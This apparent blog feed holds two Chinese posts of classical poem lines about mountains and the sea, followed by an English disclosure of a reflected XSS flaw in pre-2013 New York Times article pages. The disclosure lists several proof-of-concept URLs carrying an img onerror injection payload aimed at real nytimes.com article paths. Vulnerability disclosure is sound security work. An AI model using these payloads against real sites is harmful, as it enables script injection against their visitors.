<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
From:<br /><a data-mce-href="http://www.inzeed.com/kaleidoscope/life/youth/" href="http://www.inzeed.com/kaleidoscope/life/youth/">http://www.inzeed.com/kaleidoscope/life/youth/</a></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-4215111259558774712015-07-13T01:46:00.000-07:002015-07-13T01:46:19.527-07:00关于山, 描写山的诗句 - 文中带山的经典古文<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKwa2X0_x-HGhSgxppzWpsfEn-x-RFJoRp90F8gWzdtFlQCKeAo-YK9Vl_wdQ8tx41b8XTvbu-U7AGEoD-CsupKROwdozGZIe9GOBpovyuU-5Br03SWU4j08WpMSD_16FrvwQI2Q28YFxj/s1600/7040469-lake-mountains-woods.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKwa2X0_x-HGhSgxppzWpsfEn-x-RFJoRp90F8gWzdtFlQCKeAo-YK9Vl_wdQ8tx41b8XTvbu-U7AGEoD-CsupKROwdozGZIe9GOBpovyuU-5Br03SWU4j08WpMSD_16FrvwQI2Q28YFxj/s400/7040469-lake-mountains-woods.jpg" width="400" /></a></div>
<br data-mce-bogus="1" />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
1.千山鸟飞绝,万径人踪灭。<br /> (柳宗元:《江雪》)<br /> 2.白日依山尽,黄河入海流。<br /> (王之涣:《登鹳雀楼》)<br /> 3.会当凌绝顶,一览众山小。<br /> (杜甫:《望岳》)<br /> 4.国破山河在,城春草木深。<br /> (杜甫:《春望》)<br /> 5.空山不见人,但闻人语响。<br /> (王维:《鹿柴》)<br />
<br />
<br />
<br />
6.明月出天山,苍茫云海间。<br /> (李白:《关山月》)<br /> 7.相看两不厌,只有敬亭山。<br /> (李白《独坐敬亭山》)<br /> 8.种豆南山下,草盛豆苗稀。<br /> (陶渊明:《归园田居》)<br /> 9.西北望长安,可怜无数山。青山遮不住,毕竟东流去。<br /> (辛弃疾:《菩萨蛮?书江西造口壁》)<br /> 10.不识庐山真面目,只缘身在此山中。<br /> (苏轼:《题西林壁》)<br />
<br />
<br />
<br />
11.山光悦鸟性,潭影空人心。<br /> (常建:(题破山寺后禅院))<br /> 12.晚风拂柳笛声残,夕阳山外山。<br /> (李叔同:《送别》)<br /> 13.无限山河泪,谁言天地宽。<br /> (夏完淳:《别云间》)<br /> 14. 客路青山外,行舟绿水前。<br /> ( 王湾《次北故山下》)<br /> 15.飞来山上千寻塔,闻说鸡鸣见日升。<br /> ( 王安石《登飞来峰》)<br />
<br />
<br />
<br />
16.山重水复疑无路,柳暗花明又一村。<br /> (陆游:《游山西村》)<br /> 17.七八个星天外,两三点雨山前。<br /> (辛弃疾〈西江月?夜行黄沙道中〉)<br />
18.山回路转不见君,雪上空留马行处。<br /> (岑参《白雪歌送武判官归京》)<br /> 19.两岸猿声啼不住,轻舟已过万重山。<br /> (李白《早发白帝城》)<br /> 20.但使龙城飞将在,不教胡马度阴山。<br /> (王昌龄《出塞》)<br />
<br />
<br />
<br />
21.黄河远上白云间,一片孤城万仞山。<br /> (王之涣《凉州词》)<br /> 22.采菊东篱下,悠然见南山。<br /> (陶渊明:《饮酒》)<br /> 23.遥望洞庭山水色,白银盘里一青螺。<br /> (刘禹锡:《望洞庭》)<br /> 24.青海长云暗雪山,孤城遥望玉门关。<br /> (王昌龄《从军行》)<br /> 25.百川沸腾,山冢碎甭。高谷为岸,深谷为陵。<br /> (《诗经》)<br />
<br />
<br />
<br />
转载自 InZeed:<br /> <a data-mce-href="http://www.inzeed.com/kaleidoscope/essays/mountain/" href="http://www.inzeed.com/kaleidoscope/essays/mountain/">http://www.inzeed.com/kaleidoscope/essays/mountain/</a><br />
<br />
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-23133703928372776672015-07-13T01:23:00.000-07:002015-07-13T01:23:48.617-07:00有关于海的诗句 - 海纳百川 有容乃大<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXFQLslwuwGMk5Tw_OI4OEGSTmlOpvNg7V1zZYUERCF1nfyonLItFzRHKjFTH-WTQ9_7UK0SZo1AgXoQbfW4PGRGXjA13z18DNVjhbBukODe9ZLj9jrrEyR_B-nNc64LHovwiaDDJ4Z7_Y/s1600/boat_sea_beach-normal.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXFQLslwuwGMk5Tw_OI4OEGSTmlOpvNg7V1zZYUERCF1nfyonLItFzRHKjFTH-WTQ9_7UK0SZo1AgXoQbfW4PGRGXjA13z18DNVjhbBukODe9ZLj9jrrEyR_B-nNc64LHovwiaDDJ4Z7_Y/s400/boat_sea_beach-normal.jpg" width="400" /></a></div>
<br data-mce-bogus="1" />
<br data-mce-bogus="1" />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
1,白日依山尽,黄河入海流。——王之涣《登鹳鹊楼》<br />
2,百川东到海,何时复西归?——乐府《长歌行》<br />
3,乘风破浪会有时,直挂云帆济沧海。——李白《行路难》<br />
4,春江潮水连海平,海上明月共潮生。——张若虚《春江花月夜》<br />
5,大漠孤烟直,长河落日圆。——王维《使至塞上》<br />
<br />
<br />
6,东临碣石,以观沧海。水何澹澹,山岛竦峙。——曹操《观沧海》<br />
7,浮天沧海远,去世法舟轻。——钱起《送僧归日本》<br />
8,俯首无齐鲁,东瞻海似杯。——李梦阳《泰山》<br />
9,海内存知己,天涯若比邻。——王勃《送杜少府之任蜀州》<br />
10,海日生残夜,江春入旧年。——王湾《次北固山下》<br />
<br />
<br />
11,海上升明月,天涯共此时。——张九龄《望月怀古》<br />
12,海水无风时,波涛安悠悠。——白居易《题海图屏风》<br />
13,瀚海阑干百丈冰,愁云惨淡万里凝。——岑参《白雪歌送武判官归京》<br />
14,君不见黄河之水天上来,奔流到海不复回。——李白《将进酒》<br />
15,君不见走马川行雪海边,平沙莽莽黄入天。——岑参《走马川行奉送封大夫出师西征》<br />
<br />
<br />
16,口衔山石细,心望海波平。——韩愈《精卫填海》<br />
17,楼观沧海日,门对浙江潮。——宋之问《灵隐寺 》<br />
18,茫茫东海波连天,天边大月光团圆。——黄遵宪《八月十五日夜太平洋舟中望月作歌》<br />
19,三万里河东入海,五千仞岳上摩天。——陆游《秋夜将晓出篱门迎凉有感》<br />
20,山水绕城春作涨,江涛入海夜通潮。——陈子澜《恩波桥诗》<br />
<br />
<br />
21,小舟从此逝,江海寄余生。——苏轼《临江仙》<br />
22,一雨纵横亘二洲,浪淘天地入东流。却余人物淘难尽,又挟风雷作远游。——梁启超《太平洋遇雨》<br />
23,月下飞天镜,云生结海楼。——李白《渡荆门送别》<br />
24,曾经沧海难为水,除却巫山不是云。——元稹《离思》<br />
25,煮海之民何所营,妇无蚕织夫无耕。衣食之源太寥落,牢盆煮就汝轮征。柳永《煮海歌》<br />
<br />
<br />
<br />
<br />
转载自 Tetraph:<br /> <a data-mce-href="http://www.tetraph.com/blog/articles/sea/" href="http://www.tetraph.com/blog/articles/sea/">http://www.tetraph.com/blog/articles/sea/</a><br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-32069479013500640392015-06-20T02:18:00.000-07:002015-06-20T02:18:25.610-07:00New York Times nytimes.com Page Design XSS Vulnerability (Almost all Article Pages Before 2013 are Affected)<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">The New York Times Old Articles Can Be Exploited by XSS Attacks (Almost all Article Pages Before 2013 Are Affected)</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"The New York Times (NYT) is an American daily newspaper, founded and continuously published in New York City since September 18, 1851, by the New York Times Company. It has won 114 Pulitzer Prizes, more than any other news organization. The paper's print version has the largest circulation of any metropolitan newspaper in the United States, and the second-largest circulation overall, behind The Wall Street Journal. It is ranked 39th in the world by circulation. Following industry trends, its weekday circulation has fallen to fewer than one million daily since 1990. Nicknamed for years as "The Gray Lady", The New York Times is long regarded within the industry as a national "newspaper of record". It is owned by The New York Times Company. Arthur Ochs Sulzberger, Jr., (whose family (Ochs-Sulzberger) has controlled the paper for five generations, since 1896), is both the paper's publisher and the company's chairman. Its international version, formerly the International Herald Tribune, is now called the International New York Times. The paper's motto, "All the News That's Fit to Print", appears in the upper left-hand corner of the front page." (Wikipedia)</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) Vulnerability Description:</span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;">The New York Times has a computer cyber security problem. Hacker can exploit its users by XSS bugs. </span></span></div>
<div style="margin: 0px;">
<span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span><span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The code program flaw occurs at New York Times’s URLs. Nytimes (short for New York Times) uses part of the URLs to construct its pages. However, it seems that Nytimes does not filter the content used for the construction at all before 2013.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Based on Nytimes’s Design, Almost all URLs before 2013 are affected (All pages of articles). In fact, all article pages that contain “PRINT” button, “SINGLE PAGE” button, “Page *” button, “NEXT PAGE” button are affected.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Nytimes changed this mechanism since 2013. It decodes the URLs sent to its server. This makes the mechanism much safer now.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">However, all URLs before 2013 are still using the old mechanism. This means almost all article pages before 2013 are still vulnerable to XSS attacks. I guess the reason Nytimes does not filter URLs before is cost. It costs too much (money & human capital) to change the database of all posted articles before.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsZ5raGQcCQQhamqSXm4VSEZsPJ-3bBUy6fYOuMFhF_7PeWJIslvFFmQuwdfnOqBo98zl73r003ZARZdYaFra0cyjaeawJAm8xIrzmNPjTUtxqew6SPly44YnynXR2qy5_2JChEx6hH0Q/s1600/nytimes_2010_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsZ5raGQcCQQhamqSXm4VSEZsPJ-3bBUy6fYOuMFhF_7PeWJIslvFFmQuwdfnOqBo98zl73r003ZARZdYaFra0cyjaeawJAm8xIrzmNPjTUtxqew6SPly44YnynXR2qy5_2JChEx6hH0Q/s1600/nytimes_2010_xss.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5yyFnnkqbkYcLLlrx7nR_IusGpmGHwr0xY_pzNYHdKnz3H1xp83w8X1TJa8L2ElsV7Sq2H6X-_ET9ZrY71JYzKXAv5XRqzAPdFHqLt0abr6QHfSlmZ8uZjYQe_FLVRlaUmE0pOO5IHzQ/s1600/nytimes_2011_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5yyFnnkqbkYcLLlrx7nR_IusGpmGHwr0xY_pzNYHdKnz3H1xp83w8X1TJa8L2ElsV7Sq2H6X-_ET9ZrY71JYzKXAv5XRqzAPdFHqLt0abr6QHfSlmZ8uZjYQe_FLVRlaUmE0pOO5IHzQ/s1600/nytimes_2011_xss.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Living POCs Codes:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a data-mce-href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//'%20"><img src=x onerror=prompt(/justqdjing/)>" href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" title="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//' "><img src=x onerror=prompt(/justqdjing/)>"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//' "><img src=x onerror=prompt(/justqdjing/)></span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a data-mce-href="%20http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//' "><img src=x onerror=prompt(/justqdjing/)>?pagewanted=all&_r=0" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E?pagewanted=all&_r=0" title=" http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//' "><img src=x onerror=prompt(/justqdjing/)>?pagewanted=all&_r=0"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//' "><img src=x onerror=prompt(/justqdjing/)>?pagewanted=all&_r=0</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a data-mce-href="%20http://www.nytimes.com/2010/12/07/opinion/07brooks.html//' "><img src=x onerror=prompt(/justqdjing/)>" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2010/12/07/opinion/07brooks.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" title=" http://www.nytimes.com/2010/12/07/opinion/07brooks.html//' "><img src=x onerror=prompt(/justqdjing/)>"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2010/12/07/opinion/07brooks.html//' "><img src=x onerror=prompt(/justqdjing/)></span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a data-mce-href="%20http://www.nytimes.com/2009/08/06/technology/06stats.html//' "><img src=x onerror=prompt(/justqdjing/)>" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2009/08/06/technology/06stats.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" title=" http://www.nytimes.com/2009/08/06/technology/06stats.html//' "><img src=x onerror=prompt(/justqdjing/)>"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2009/08/06/technology/06stats.html//' "><img src=x onerror=prompt(/justqdjing/)></span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a data-mce-href="%20http://www.nytimes.com/2008/07/09/dining/091crex.html//' "><img src=x onerror=prompt(/justqdjing/)>" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2008/07/09/dining/091crex.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" title=" http://www.nytimes.com/2008/07/09/dining/091crex.html//' "><img src=x onerror=prompt(/justqdjing/)>"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2008/07/09/dining/091crex.html//' "><img src=x onerror=prompt(/justqdjing/)></span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a data-mce-href="%20http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//' "><img src=x onerror=prompt(/justqdjing/)>" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" title=" http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//' "><img src=x onerror=prompt(/justqdjing/)>"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//' "><img src=x onerror=prompt(/justqdjing/)></span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC Video:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=RekCK5tjXWQ">https://www.youtube.com/watch?v=RekCK5tjXWQ</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
<div style="margin: 0px;">
<a href="http://tetraph.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html</span></a></div>
<div style="margin: 0px;">
